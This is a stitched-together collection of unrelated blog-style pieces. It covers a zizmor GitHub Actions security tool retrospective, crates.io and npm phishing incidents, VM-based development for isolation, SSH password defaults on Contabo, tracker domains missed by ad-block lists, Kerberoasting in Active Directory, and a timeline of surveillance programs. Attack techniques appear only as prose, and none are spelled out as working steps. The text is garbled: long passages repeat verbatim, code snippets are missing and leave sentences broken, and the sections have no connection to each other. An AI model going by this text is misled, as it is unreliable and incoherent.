Most of that growth was in the shape of a “hockey stick” during the first few months, but growth has been steady overall: About 3.2 million downloads from PyPI alone , just barely squeaking us into the top 10,000 most-downloaded packages on PyPI 2 . Potentially more interesting is the growth in PyPI downloads: around 1 in 5 of those downloads (633K precisely) were in the last month alone . Notably, PyPI is just one of several distribution channels for zizmor: the official Docker image has another ~140K downloads, the Homebrew formula has another ~50K, conda-forge has another ~90K, and so forth. And these are only the ones I can easily track! So, so many cool downstream users: cURL, CPython, PyPI itself, Rust, Rustls, Sigstore, Anubis, and many others are all running zizmor in their CI/CD to proactively catch potential security issues. In addition to these projects (who humble me with their use), I’ve also been thrilled to see entire communities and companies adopt and/or recommend zizmor: pyOpenSci , Grafana Labs , and Wiz have all publicly recommended zizmor based on their own experience or expertise. Roughly 50 contributors , excluding myself and bots, along with several dozen “regulars” who file bug reports and feature requests. This number is easily the most satisfying of the above: it’s a far cry from the project’s start, when I wasn’t sure if anyone would ever use it, let alone contribute to it. Some thoughts and observations from the past year. People like to use zizmor, even though it’s a security tool! Crazy! Most people, including myself , hate security tools : they are, as a class, frustrating to install and configure, obtuse to run, and are arrogantly incorrect in their assumption of user tolerance for signal over noise. My own negative experiences with security tooling made me hesitant to build zizmor in the open: I was worried that (1) no one would use it, or (2) lots of people would use it in anger , and hate it (and me) for it. To my surprise, this didn’t happen! The overwhelming response to zizmor has been positive: I’ve had a lot of people thank me for building it, and specifically for making it pleasant to use. I’ve tried to reflect on what exactly I did to succeed in not eliciting a “hate” reaction to zizmor, and the following things come to mind: It’s very easy to install and run: distributing it via PyPI (even though it’s a pure Rust binary) means that it’s a single or away for most users. It’s very fast by default: offline runs take tens of milliseconds for representative inputs; online runs are slower, but still fast enough to outpace typical CI/CD setups. In other words: people very rarely wait for zizmor to complete, or in the worst case wait no longer than they’re already waiting for the rest of their CI/CD. It strikes the right balance with its persona design: the default (“ regular ”) persona prioritizes signal over noise, while letting users opt into more noisy personae (like pedantic and auditor ) as they please. One outcome from this choice which has been (pleasantly) surprising is seeing users opt into a more sensitive persona than the default, including even enforcing zizmor at the pedantic or auditor level in their CI/CD. I didn’t expect this (I expected most users to ignore non-default personae), and it suggests that zizmor’s other usability-first design decisions afford us a “pain budget” that users are willing to spend on more sensitive checks. On a very basic level, I don’t really want zizmor to exist: what I really want is a CI/CD system that’s secure by construction , and that doesn’t require static analysis to be bolted onto it for a degree of safety. By analogy: I want the Rust of CI/CD, not C or C++ with a layer of ASan slapped on top. GitHub Actions could have been that system (and arguably still could be), but there appears to be relatively little internal political 3 appetite within GitHub for making that happen 4 . In this framing, I’ve come to see zizmor as an external forcing function on GitHub: a low-friction, low-complexity tool that reveals GitHub Actions’ security flaws is also a tool that gives the hardworking engineers inside of GitHub the kind of political ammunition they need to convince their leadership to prioritize the product itself. I’m not conceited enough to think that zizmor (or I) alone am the only such external forcing function: there are many others, including entire companies seeking to capitalize on GitHub Actions’ flaws. However, I do think the last year of zizmor’s development has seen GitHub place more public emphasis on security improvements to GitHub Actions 5 , and I would like to think that zizmor has played at least a small part in that. Six months ago, I would have probably said that zizmor is mostly done : I was happy with its core design and set of audits, and I was having trouble personally imagining what else would be reasonable to add to it. But then, stuff kept happening! zizmor’s user base has continued to identify new things that zizmor should be doing, and have continued to make contributions towards those things. They’ve also identified new ways in which zizmor should operate: the auto-fix mode (v1.10.0) and LSP support (v1.11.0) are just two examples of this. This has made me less certain about what “done” will look like for zizmor: it’s clear to me that a lot of other people have (very good!) ideas about what zizmor can and should do to make the GitHub Actions ecosystem safer, and I’m looking forward to helping to realize those ideas. Some specific things I see on the horizon: More interprocedural analysis: zizmor is largely “intraprocedural” in the moment, in the sense the it analyzes individual inputs (workflows or action definitions) in isolation. This approach makes zizmor simple, but it also leaves us with an partial picture of e.g. a repository’s overall CI/CD posture. As a simple example: the unpinned-uses audit will correctly flag any unpinned action usages, but it won’t detect transitively unpinned usages that cross input boundaries. Better support for large-scale users: it’s increasingly clear to me that a significant portion (and increasing) portion of zizmor’s userbase is security teams within bigger open source projects (and companies), who want to use zizmor as part of “estate management” for dozens, hundreds, or even thousands of individual repositories. zizmor itself doesn’t struggle to operate in these settings, but large scales make it harder to triage and incrementally address zizmor’s findings. I’m not sure exactly what an improved UX for bulk triage will look like, but some kind of GitHub App integration seems worth exploring 6 . A bigger architectural reevaluation: zizmor’s current architecture is naïve in the sense that individual audits don’t share or re-use computation between each other. For example, two audits that both evaluate GitHub Actions expressions will independently re-parse those expressions rather than caching that reusing that work. This is not a performance issue at zizmor’s current audit count, but will likely eventually become one. When this happens, I’ll likely need to think about a larger architectural change that allows audits to either share computed analysis state or push more analysis state into zizmor’s input collection phase. Another (unrelated) architectural change that’ll likely eventually need to happen involves , which zizmor currently uses extensively: its deprecated status is a long-term maintenance risk. My hope is that alternatives (like saphyr , which I’ve been following) will become sufficiently mature and feature-rich in the medium-long term to enable fully replacing (and potentially even some of our use of in e.g. and .). It depends on how you count: zizmor’s first commit was roughly 13 months ago, while its first tagged release (v0.1.0) was roughly 11 months ago. So I’m splitting the two and saying it’s been one year.  ↩ Number #9,047 as of time of writing.  ↩ Read: product leadership. I have a great deal of faith in and respect for GitHub’s engineers, who seem to be uniformly upset about the slow-but-accelerating degradation of GitHub’s product quality.  ↩ A more cynical framing would be that GitHub has entered the “value strip-mining” phase of its product lifecycle, where offerings like GitHub Actions are kept alive just enough to meet contractual obligations and serve as a staging bed for the next round of “innovation” (read: AI in more places). Fixing longstanding flaws in GitHub Actions’ design and security model would not benefit this phase, so it is not prioritized.  ↩ Off the top of my head: immutable actions/releases , fixing action policies , acknowledging how dangerous is, &c.  ↩ This avenue of exploration is not without risks: my experience has been that many security tools that choose to go the “app” integration route end up as Yet Another Infernal Dashboard that security teams dread actually using.  ↩ A new (pedantic-level) undocumented-permissions audit rule, which flags explicit permission grants (like ) that lack an explanatory comment. Many thanks to @johnbillion for contributing this! (Long requested) support for disabling individual audit rules entirely, via in the configuration. Support for auto-fixing many of the obfuscation audit’s findings, including a brand new constant expression evaluator for github-actions-expressions that can unroll many common cases of obfuscated GitHub Actions expressions. Many thanks to @mostafa for contributing this, along with so much else of zizmor’s auto-fix functionality over the last few releases! Support for “grouped” configurations, which resolve a long-standing architectural limitation in how zizmor loads and applies a user’s configuration. The TL;DR of this change is that versions of zizmor prior to 1.13.0 could only ever load a single configuration file per invocation, which meant that invocations like wouldn’t honor any configuration files in or . This has been changed so that each input group (i.e. each input argument to ) loads its own isolated configuration. In practice, this should have no effect on typical users, since the average user likely only runs or . But it’s something to be aware of (and will likely benefit you) if you’re a bulk user! 26 unique audit rules , encompassing a wide range of reactive and proactive security checks for GitHub Actions workflows and action definitions. This is up from 10 rules in the first tagged release (v0.1.0), which predates the changelog. It also undercounts the growth of zizmor’s complexity and feature set, since many of the rules have been significantly enhanced over time. Just over 3000 stars on GitHub, growing from close to zero at the start of the year. Most of that growth was in the shape of a “hockey stick” during the first few months, but growth has been steady overall: About 3.2 million downloads from PyPI alone , just barely squeaking us into the top 10,000 most-downloaded packages on PyPI 2 . Potentially more interesting is the growth in PyPI downloads: around 1 in 5 of those downloads (633K precisely) were in the last month alone . Notably, PyPI is just one of several distribution channels for zizmor: the official Docker image has another ~140K downloads, the Homebrew formula has another ~50K, conda-forge has another ~90K, and so forth. And these are only the ones I can easily track! So, so many cool downstream users: cURL, CPython, PyPI itself, Rust, Rustls, Sigstore, Anubis, and many others are all running zizmor in their CI/CD to proactively catch potential security issues. In addition to these projects (who humble me with their use), I’ve also been thrilled to see entire communities and companies adopt and/or recommend zizmor: pyOpenSci , Grafana Labs , and Wiz have all publicly recommended zizmor based on their own experience or expertise. Roughly 50 contributors , excluding myself and bots, along with several dozen “regulars” who file bug reports and feature requests. This number is easily the most satisfying of the above: it’s a far cry from the project’s start, when I wasn’t sure if anyone would ever use it, let alone contribute to it. It’s very easy to install and run: distributing it via PyPI (even though it’s a pure Rust binary) means that it’s a single or away for most users. It’s very fast by default: offline runs take tens of milliseconds for representative inputs; online runs are slower, but still fast enough to outpace typical CI/CD setups. In other words: people very rarely wait for zizmor to complete, or in the worst case wait no longer than they’re already waiting for the rest of their CI/CD. It strikes the right balance with its persona design: the default (“ regular ”) persona prioritizes signal over noise, while letting users opt into more noisy personae (like pedantic and auditor ) as they please. One outcome from this choice which has been (pleasantly) surprising is seeing users opt into a more sensitive persona than the default, including even enforcing zizmor at the pedantic or auditor level in their CI/CD. I didn’t expect this (I expected most users to ignore non-default personae), and it suggests that zizmor’s other usability-first design decisions afford us a “pain budget” that users are willing to spend on more sensitive checks. More interprocedural analysis: zizmor is largely “intraprocedural” in the moment, in the sense the it analyzes individual inputs (workflows or action definitions) in isolation. This approach makes zizmor simple, but it also leaves us with an partial picture of e.g. a repository’s overall CI/CD posture. As a simple example: the unpinned-uses audit will correctly flag any unpinned action usages, but it won’t detect transitively unpinned usages that cross input boundaries. Better support for large-scale users: it’s increasingly clear to me that a significant portion (and increasing) portion of zizmor’s userbase is security teams within bigger open source projects (and companies), who want to use zizmor as part of “estate management” for dozens, hundreds, or even thousands of individual repositories. zizmor itself doesn’t struggle to operate in these settings, but large scales make it harder to triage and incrementally address zizmor’s findings. I’m not sure exactly what an improved UX for bulk triage will look like, but some kind of GitHub App integration seems worth exploring 6 . A bigger architectural reevaluation: zizmor’s current architecture is naïve in the sense that individual audits don’t share or re-use computation between each other. For example, two audits that both evaluate GitHub Actions expressions will independently re-parse those expressions rather than caching that reusing that work. This is not a performance issue at zizmor’s current audit count, but will likely eventually become one. When this happens, I’ll likely need to think about a larger architectural change that allows audits to either share computed analysis state or push more analysis state into zizmor’s input collection phase. Another (unrelated) architectural change that’ll likely eventually need to happen involves , which zizmor currently uses extensively: its deprecated status is a long-term maintenance risk. My hope is that alternatives (like saphyr , which I’ve been following) will become sufficiently mature and feature-rich in the medium-long term to enable fully replacing (and potentially even some of our use of in e.g. and .). It depends on how you count: zizmor’s first commit was roughly 13 months ago, while its first tagged release (v0.1.0) was roughly 11 months ago. So I’m splitting the two and saying it’s been one year.  ↩ Number #9,047 as of time of writing.  ↩ Read: product leadership. I have a great deal of faith in and respect for GitHub’s engineers, who seem to be uniformly upset about the slow-but-accelerating degradation of GitHub’s product quality.  ↩ A more cynical framing would be that GitHub has entered the “value strip-mining” phase of its product lifecycle, where offerings like GitHub Actions are kept alive just enough to meet contractual obligations and serve as a staging bed for the next round of “innovation” (read: AI in more places). Fixing longstanding flaws in GitHub Actions’ design and security model would not benefit this phase, so it is not prioritized.  ↩ Off the top of my head: immutable actions/releases , fixing action policies , acknowledging how dangerous is, &c.  ↩ This avenue of exploration is not without risks: my experience has been that many security tools that choose to go the “app” integration route end up as Yet Another Infernal Dashboard that security teams dread actually using.  ↩

0 views
fasterthanli.me 1 months ago

crates.io phishing attempt

Earlier this week, an npm supply chain attack . It’s turn for crates.io , the main public repository for Rust crates (packages). The phishing e-mail looks like this: Andrew Gallant on BlueSky And it leads to a GitHub login page that looks like this: Barre on GitHub Several maintainers received it — the issue is being discussed on GitHub . The crates.io team has acknowledged the attack and said they’d see if they can do something about it.

0 views
crtns 1 months ago

Why I Moved Development to VMs

I've had it with supply chain attacks. The recent inclusion of malware into the package was the last straw for me. Malware being distributed in hijacked packages isn't a new phenomenon, but this was an attack specifically targeting developers. It publicly dumped user secrets to GitHub and exposed private GitHub repos publicly. I would have been a victim of this malware if I had not gotten lucky. I develop personal projects in Typescript. I've used . Sensitive credentials are stored in my environment variables and configs. Personal documents live in my home directory. And I run untrusted code in that same environment, giving any malware full access to all my data. First, the attackers utilized a misconfigured GitHub Action in the repo using a common attack pattern, the trigger. The target repo's is available to the source repo's code in the pull request when using this trigger, which in the wrong case can be used to read and exfiltrate secrets, just as it was in this incident. 💭 This trigger type is currently insecure by default . The GitHub documentation contains a warning about properly configuring permissions before using , but when security rests on developers reading a warning in your docs, you probably have a design flaw that documentation won't fix. Second, they leveraged script injection. The workflow in question interpolated the PR title directly in a script step without parsing or validating the input beforehand. A malicious PR triggered an inline execution of a modified script that sent a sensitive NPM token to the attacker. 💭 Combining shell scripts with templating is a GitHub Action feature that is insecure by design . There is a reason why the GitHub documentation is full of warnings about script injection . A more secure system would require explicit eval of all inputs instead of direct interpolation of inputs into code. I'm moving to development in VMs to provide stronger isolation between my development environments and my host machine. Lima has become my tool of choice for creating and managing these virtual machines. It comes with a clean CLI as its primary interface, and a simple YAML based configuration file that can be used to customize each VM instance. Despite having many years of experience using Vagrant and containers, I chose Lima instead. From a security perspective, the way Vagrant boxes are created and distributed is a problem for me. The provenance of these images is not clear once they're uploaded to Vagrant Cloud. To prove my point, I created and now own the and Vagrant registries. To my knowledge, there's no way to verify the true ownership of any registries in Vagrant Cloud. Lima directly uses the cloud images published by each Linux distribution. Here's a snippet of the Fedora 42 template . Not perfect, but more trustworthy. I also considered Devcontainers, but I prefer the VM solution for a few reasons. While containers are great for consistent team environments or application deploys, I like the stronger isolation boundary that VMs provide. Container escapes and kernel exploits are a class of vulnerability that VMs can mitigate and containers do not. Finally, the Devcontainer spec introduces complexity I don't want to manage for personal project development. I want to treat my dev environment like a persistent desktop where I can install tools without editing Dockerfiles. VMs are better suited to emulate a real workstation without the workarounds required by containers. Out of the box, most Lima templates are not locked down, but Lima lets you clone and configure any template before creating or starting a VM. By default, Lima VMs enable read-only file-sharing between the host user's home directory and the VM, which exposes sensitive information to the VM. I configure each VM with project specific file-sharing and no automatic port forwarding. Here's my configuration for . This template can then be used to create a VM instance After creation of the VM is complete, accessing it over SSH can be done transparently via the subcommand. The VM is now ready to be connected to my IDE. I'm mostly a JetBrains IDE user. These IDEs have a Remote Development feature that enables a near local development experience with VMs. A client-server communication model over an SSH tunnel enables this to work. Connecting my IDE to my VM was a 5 minute process that included selecting my Lima SSH config ( ) for the connection and picking a project directory. The most time consuming part of this was waiting for the IDE to download the server component to the VM. After that, the IDE setup was done. I had a fully working IDE and shell access to the VM in the IDE terminals. I haven't found any features that don't work as expected. There is also granular control over SSH port-forwarding between the VM (Remote) and host (local) built in, which is convenient for me when I'm developing a backend application. The integration between Podman/Docker and these IDEs extends to the Remote Development feature as well. I can run a full instance of Podman within my VM, and once the IDE is connected to the VM's instance of Podman, I can easily forward listening ports from my containers back to my host. The switch to VMs took me an afternoon to set up and I get the same development experience with actual security boundaries between untrusted code and my personal data. Lima has made VM-based development surprisingly painless and I'm worried a lot less about the next supply chain attack.

0 views
James O'Claire 1 months ago

Contabo Defaults Encourage Using SSH Passwords

I recently started helping a less technical friend and had my first chance to see/use Contabo VPS. I’ve been really surprised at their default security practices so far. Contabo’s default VPS creation seems to be root user and password? If you go to “Advanced” the default is to create a user called “admin” (good!) and has the option for a public SSH key. Our new server, that barely any bot knows exists, already gets 350 failed password login attempts an hour. Worse, these bots can see that password login is enabled on our server, meaning they know they should keep trying. 350 password requests an hour on a strong password isn’t much, but eventually more bots will realize our IP is using passwords and try more. Eventually after copy pasting around a password enough some compromised browser plugin / discord plugin etc will capture the password and put it in a list. Contabo “knows” this, even if they don’t practice it: https://contabo.com/blog/how-to-use-ssh-keys-with-your-server Conatabo is bad that they encourage you via their defaults when setting up the VPS to use SSH password. They went out of their way to do that, likely to not put roadblocks up for new users, but it’s bad security. When we hit an issue we contacted Contabo support. They asked us to copy paste our password so they could help troubleshoot an issue. While I appreciate that level of support, assuming users have a SSH password and asking them to email it seems crazy to me. Now there is a record on both our email providers of that password and IP. 1) Use pub/private SSH keys. We can copy/paste public keys anywhere we want, super safe. 2) Make future servers with a user other than root and disable login with root. Root user has special login privileges (allowing SSH to get hammered). And in the future, I’ll complain a bit less about DigitalOcean/AWS/GCP.

0 views
James O'Claire 1 months ago

Mobile Trackers your Ad-Blocker Doesn’t Know About

This is the full list of the main API endpoints that apps send data to. This is across ~70k android apps and the smallest endpoint has about ~90 apps that send data to it, meaning it’s unlikely to be an app developer’s domain. Then I checked whether these domains were in any of: https://github.com/StevenBlack/hosts , https://easylist.to/easylist/easylist.txt or https://easylist.to/easylist/easyprivacy.txt . I was surpised how many were NOT in any of the lists, over 1/3 at 127 and individually the blocker lists only had about 1/3 of these domains. I’m not currently going to open PR tickets for these domains, as the scale that I collected these at could easily contain some perfectly acceptable use cases. I’ve tried to remove those that I recognize as acceptable so far. Here’s a Google sheet of the same data (feel free to leave comments).

0 views

Kerberoasting

I learn about cryptographic vulnerabilities all the time, and they generally fill me with some combination of jealousy (“oh, why didn’t I think of that”) or else they impress me with the brilliance of their inventors. But there’s also another class of vulnerabilities: these are the ones that can’t possibly exist in important production software, because there’s no way anyone could still do that in 2025. Today I want to talk about one of those ridiculous ones, something Microsoft calls “low tech, high-impact”. This vulnerability isn’t particularly new; in fact the worst part about it is that it’s had a name for over a decade, and it’s existed for longer than that. I’ll bet most Windows people already know this stuff, but I only happened to learn about it today, after seeing a letter from Senator Wyden to Microsoft , describing how this vulnerability was used in the May 2024 ransomware attack on the Ascension Health hospital system . The vulnerability is called Kerberoasting , and TL;DR it relies on the fact that Microsoft’s Active Directory is very, very old . And also: RC4. If you don’t already know where I’m going with this, please read on. A couple of updates: The folks on HN pointed out that I was using some incorrect terms in here (sorry!) and added some good notes, so I’m updating below. Also, Tim Medin, who discovered and named the attack, has a great post on it here . Microsoft’s Active Directory (AD) is a many-tentacled octopus that controls access to almost every network that runs Windows machines. The system uses centralized authentication servers to determine who gets access to which network resources. If an employee’s computer needs to access some network Service (a file server, say), an Active Directory server authenticates the user and helps them get securely connected to the Service. This means that AD is also the main barrier ensuring that attackers can’t extend their reach deeper into a corporate network. If an attacker somehow gets a toehold inside an enterprise (for example, because an employee clicks on a malicious Bing link ), they should absolutely not be able to move laterally and take over critical network services. That’s because any such access would require the employee’s machine to have access to specialized accounts (called “Service accounts”) with privileges to fully control those machines. A well-managed network obviously won’t allow this. This means that AD is the “guardian” that stands between most companies and total disaster. Unfortunately, Active Directory is a monster dragged from the depths of time. It uses the Kerberos protocol, which was first introduced in early 1989. A lot of things have happened since 1989! In fairness to Microsoft, Active Directory itself didn’t actually debut until about 1999; but (in less fairness), large portions of its legacy cryptography from that time period appear to still be supported in AD. This is very bad, because the cryptography is exceptionally terrible. Let me get specific. When you want to obtain access to some network resource (a “Service” in AD parlance), you first contact an AD server (called a KDC) to obtain a “ ticket ” that you can send to the Service to authenticate. This ticket is encrypted using a long-term Service “password” established at the KDC and the Service itself, and it’s handed to the user making the call. Now, ideally, this Service password is not really a password at all: it’s actually a randomly-generated cryptographic key. Microsoft even has systems in place to generate and rotate these keys regularly. This means the encrypted ticket will be completely inscrutable to the user who receives it, even if they’re malicious. But occasionally network administrators will make mistakes, and one (apparently) somewhat common mistake is to set up a Service that’s connected to an ordinary user account, complete with a human-generated password. Since human passwords probably are not cryptographically strong, the tickets encrypted using them are extremely vulnerable to cracking. This is very bad, since any random user — including our hypothetical laptop malware hacker — can now obtain a copy of such a ticket, and attempt to crack the Service’s password offline by trying many candidate passwords using a dictionary attack . The result of this is that the user learns an account password that lets them completely control that essential Service. And the result of that (with a few extra steps) is often ransomware. Isn’t that cute? Of course, it’s not. It’s actually a terrible design that should have been done away with decades ago. We should not build systems where any random attacker who compromises a single employee laptop can ask for a message encrypted under a critical password! This basically invites offline cracking attacks, which do not need even to be executed on the compromised laptop — they can be exported out of the network to another location and performed using GPUs and other hardware. There are a few things that can stop this attack in practice. As we noted above, if the account has a long enough (random!) password, then cracking it should be virtually impossible. Microsoft could prevent users from configuring services with weak human-generated passwords, but apparently they don’t — at least because this is something that’s happened many times (including at Ascension Health.) So let’s say you did not use a strong cryptographic key as your Service’s password. Where are you? Your best hope in this case is that the encrypted tickets are extremely challenging for an attacker to crack. That’s because at this point, the only thing preventing the attacker from accessing your Service is computing power. But — and this is a very weak “but” — computing power can still be a deterrent! In the “standard” authentication mode, tickets are encrypted with AES, using a key derived using 4,096 iterations of PBKDF2 hashing , based on the Service password and a per-account salt ( Update : which is not truly random salt, it’s a combination of domain and principal name.) The salt means an attacker cannot easily pre-compute a dictionary of hashed passwords, and while the PBKDF2 (plus AES) isn’t an amazing defense, it puts some limits on the number of password guesses that can be attempted in a given unit of time. This page by Chick3nman gives some excellent password cracking statistics computed using an RTX 5090 . It implies that a hacker can try 6.8 million candidate passwords every second, using AES-128 and PBKDF2. This isn’t the end of the story. In fact it’s self-evident that this is not the end of the story, because Active Directory was invented in 1999, which means at some point we’ll have to deal with RC4. Here’s the thing. Anytime you see cryptography born in the 1990s and yet using AES, you cannot be dealing with the original. What you’re looking at is the modernized, “upgraded” version of the original. The original probably used an abacus and witchcraft, or (failing that) at least some combination of unsalted hash functions and RC4 . And here’s the worst part: it turns out that in Active Directory, when a user does not configure a Service account to use a more recent mode, then Kerberos will indeed fall back to RC4, combined with unsalted NT hashes (basically, one iteration of MD4 .) The main implication of using RC4 (and NT hashing) is that tickets encrypted this way become hilariously, absurdly fast to crack. According to our friend Chick3nman , the same RTX 5090 can attempt 4.18 billion (with a “b”) password guesses every second. That’s roughly 1000x faster than the AES variant. As an aside, the NT hashes are not salted, which means they’re vulnerable to pre-computation attacks that involve rainbow tables . I had been meaning to write about rainbow tables recently on this blog, but had convinced myself that they mostly don’t matter, given that these ancient unsalted hash functions are going away. I guess maybe I spoke too soon? Update: see Tom Tervoort’s excellent comment below, which mentions that there is a random 8-byte “confounder” acting as a salt during key derivation. Clearly not enough. These “Kerberoasting” attacks have been around for ages: the technique and name is credited to Tim Medin who presented it in 2014 (and many popular blogs followed up on it) but the vulnerabilities themselves are much older. The fact that there are practical ransomware attacks using these ideas in 2024 indicates that (1) system administrators aren’t hardening things enough, but more importantly , (2) Microsoft is still not turning off the unsafe options that make these attacks possible. To give some sense of where we are, in October 2024, Microsoft published a blog post on how to avoid Kerberos-based attacks ( NB: I cannot say Kerberoasting again and take myself seriously) . The recommendations are all kind of dismal. They recommend that administrators should use proper automated key assignment, and if they can’t do that, then to try to pick “really good long passwords”, and if they can’t do that, to pretty please shut off RC4. But Microsoft doesn’t seem to do anything proactive, like absolutely banning obsolete legacy stuff , or being completely obnoxious and forcing admins to upgrade their weird and bad legacy configurations. Instead this all seems much more like a reluctant and half-baked bit of vulnerability management. I’m sure there are some reasons why this is, but I refuse to believe they’re good reasons, and Microsoft should probably try a lot harder to make sure these obsolete services go away. It isn’t 1999 anymore, and it isn’t even 2014. If you don’t believe me on these points, go ask Ascension Health.

0 views
Xe Iaso 1 months ago

We all dodged a bullet

This post and its online comment sections are blame-free zones. We are not blaming anyone for clicking on the phishing link. If you were targeted with such a phishing attack, you'd fall for it too and it's a matter of when not if. Anyone who claims they wouldn't is wrong. This is also a bit of a rant. Yesterday one of the biggest package ecosystems had very popular packages get compromised . We're talking functionality like: These kinds of dependencies are everywhere and nobody would even think that they could be harmful. Getting code into these packages means that it's almost guaranteed a free path to production deployments. If an open proxy server (a-la Bright Data or other botnets that the credit card network tolerates for some reason), API key stealer, or worse was sent through this chain of extreme luck on the attacker's part, then this would be a completely different story. We all dodged a massive bullet because all the malware did was modify the destination addresses of cryptocurrency payments mediated via online wallets like MetaMask . As someone adjacent to the online security community, I have a sick sense of appreciation for this attack. This was a really good attack. It started with a phishing email that I'd probably fall for if it struck at the right time: This is frankly a really good phishing email. Breaking it down: This is a 10/10 phishing email. Looking at it critically the only part about it that stands out is the domain "npmjs.help" instead of "npmjs.com". Even then, that wouldn't really stand out to me because I've seen companies use new generic top level domains to separate out things like the blog at or the docs at , not to mention the stack . One of my friends qdot also got the phishing email and here's what he had to say: I got the email for it and was like "oh I'll deal with this later". Saved by procrastination! — qdot ( @buttplug.engineer ) September 8, 2025 at 2:04 PM With how widely used these libraries are, this could have been so much worse than it was. I can easily imagine a timeline where this wasn't just a cryptocurrency interceptor. Imagine if something this widely deployed into an ecosystem where automated package bumping triggering production releases is common did API key theft. You'd probably have more OpenAI API keys than you know what you'd do with. You could probably go for years without having to pay for AWS again. It is just maddening to me that a near Jia Tan level chain of malware and phishing was wasted on cryptocurrency interception that won't even run in the majority of places those compromised libraries were actually used. When I was bumping packages around these issues, I found that most of these libraries were used in command line tools. This was an attack obviously targeted towards the Web 3 ecosystem as users of Web 3 tools are used to making payments with their browsers. With my black hat on, I think that the reason they targeted more generic packages instead of Web 3 packages was so that the compromise wouldn't be as noticed by the Web 3 ecosystem. Sure, you'd validate the rigging that helps you interface with Metamask, but you'd never think that it would get monkey-patched by your color value parsing library. One of the important things to take away from this is that every dependency could be malicious. We should take the time to understand the entire dependency tree of our programs, but we aren't given that time. At the end of the day, we still have to ship things.

0 views
マリウス 1 months ago

Mass-Surveillance History & Trivia

Note: This post focuses on mostly Wikipedia-documented programs/acts and major events. Many additional local or classified efforts exist but are omitted if lacking a solid Wikipedia entry. Info: Years denote program start, reveal, or key legislative milestone. Organized chronologically with brief context and trivia. VENONA (USA/UK/AUS) [1943–1980] SIGINT program decrypting Soviet communications; Not domestic surveillance per se but foundational to Cold War signals intelligence. Project SHAMROCK (USA) [1945–1975] NSA predecessor harvested copies of most international telegraphs entering/leaving the U.S.; Ended after the Church Committee. UKUSA Agreement (from which Five Eyes derives) [1946] Signals intelligence alliance formalized publicly later; Underpins many joint programs. NSA founded (USA) [1952] Creation of the National Security Agency institutionalized large-scale SIGINT capabilities. COINTELPRO (USA) [1956–1971] FBI’s domestic counterintelligence program targeting civil rights groups, anti-war activists, and others; Involved infiltration and surveillance. Project MINARET (USA) [1967–1973] NSA watch-list program surveilling U.S. citizens (including MLK Jr.) without warrants; Exposed in 1975–76. ECHELON (Five Eyes) [Late 1960s onward] Global signals interception network (NSA, GCHQ, ASD, CSE, GCSB) monitoring satellite/microwave communications. Church & Pike Committees (USA) [1975–1976] Congressional inquiries exposing illegal domestic surveillance; Led to FISA (1978) and the FISC court. FISA & FISC (USA) [1978] Legal framework for foreign intelligence surveillance with secret court orders. BLARNEY / FAIRVIEW / STORMBREW / OAKSTAR (USA) [1978 onward] NSA “corporate partner” upstream collection families at backbone chokepoints. Clipper Chip & Skipjack (USA) [1993–1996] Government-proposed key-escrow encryption standard; Abandoned after public backlash and cryptanalytic concerns. SORM launched (Russia) [1995] “System for Operative Investigative Activities” requiring ISPs to install FSB access; Later expanded to SORM-2 (internet) and SORM-3 (deep metadata). Carnivore / DCS1000 (USA) [1997–2001] FBI packet-sniffing system for ISP-side interception. NSAKEY (USA) [1999 (alleged)] Reported Microsoft Windows cryptographic key controversy; Raised concerns about possible NSA backdoor. Onyx interception system (Switzerland) [2000] Satellite communications interception sites at Zimmerwald, Heimenschwand, Leuk; First publicized mid-2000s. Interception Modernisation Programme (UK) [2000–2006] (via RIPA ) Ambitious plan to expand traffic data retention and interception; Later morphed into follow-on initiatives. STELLAR WIND (USA) [2001–2007] Post-9/11 warrantless surveillance (content + metadata); Aspects later routed into FISA processes. Data Retention beginnings (EU) [2001] Post-9/11 debates culminated in the 2006 EU Data Retention Directive mandating telco retention (later invalidated in 2014, see below). SITEL lawful interception system (Spain) [2001] National police interception platform for phone/internet data. Total Information Awareness (USA) [2002–2003] DARPA’s Information Awareness Office sought vast data-integration for pattern analysis; Defunded amid civil-liberties outcry. ThinThread (USA) [2002–2008] ( later Trailblazer ) Competing NSA programs; ThinThread emphasized privacy protections; Trailblazer pursued broader data analysis, ultimately cancelled after overruns/criticism. AT&T Room 641A (USA) [2003 (installed) / 2006 (revealed)] Fiber-optic splitter room in San Francisco (Narus gear) enabling backbone interception under NSA partnerships. Operation EIKONAL (Germany/NSA) [2004–2005] BND with NSA tapped Deutsche Telekom Frankfurt switch; Filters proved leaky; Later parliamentary inquiry. Golden Shield (China) [2006] (subsystem Great Firewall ) “Golden Shield Project” integrates policing with internet control; Surveillance and filtering co-develop. EU Data Retention Directive (EU) [2006] Mandated retention of telecom metadata across member states (up to 24 months); Struck down by CJEU in 2014. Hemisphere Project (USA) [2007] AT&T call-records database queried by law enforcement with parallel-construction concerns; Data reaches back decades. BULLRUN / EDGEHILL (USA/UK) [2007] Efforts to defeat encryption standards and implementations via covert influence and exploits. PRISM (USA) [2007 (begins) / 2013 (revealed)] NSA program collecting data from U.S. internet companies under FISA §702 orders. FRA-lagen (Sweden) [2008] Law enabling the National Defence Radio Establishment (FRA) to intercept cross-border cable communications; Amended for more oversight (2009). XKEYSCORE [2008] Distributed search/analysis system for captured internet data; Used by NSA, GCHQ, and partners including BND under agreements. Optic Nerve (UK) [2008] GCHQ bulk-captured Yahoo webcam images (including non-targets) for facial-recognition research. Karma Police (UK) [2008] GCHQ project building web-browsing profiles tied to IP addresses for “behavioural detection.” Tempora build-out (UK) [2008–2011] GCHQ buffer-records fiber traffic at landing stations; Integrated with Five Eyes analytics. GCSB law changes (New Zealand) [2009] Legal reforms later enabled broader assistance to domestic agencies; Subsequent controversies and oversight changes. Mastering the Internet & Global Telecoms Exploitation (UK) [2009] GCHQ capstone initiatives to scale cable tapping and data analytics. MYSTIC (USA) [2009–2014] NSA voice interception of entire countries’ phone calls; Sub-program SOMALGET stored full audio in places like the Bahamas. Royal Concierge (UK) [2010] GCHQ monitoring of hotel booking systems to track diplomats for potential ops. Boundless Informant (USA) [2013] NSA global metadata visualization tool tallying collection by country/source. MUSCULAR (USA/UK) [2013] NSA & GCHQ tapped private Google/Yahoo data-center links overseas; Exploited unencrypted inter-DC traffic (later encrypted by companies). 2010s Global Surveillance Disclosures (worldwide) [2013] Wave of revelations across Five Eyes and partners prompting legislative reforms. CJEU invalidates EU Data Retention Directive (EU) [2014] Digital Rights Ireland decision strikes blanket retention; Many national laws revised or challenged. Project SPEARGUN allegations (New Zealand) [2014] Reports that GCSB sought to tap a trans-Pacific cable and enable bulk metadata flows to NSA. Intelligence Act (France) [2015] Legalized wide surveillance powers (including algorithmic “black boxes” at ISPs) after terror attacks; Provisions for international communications interception. 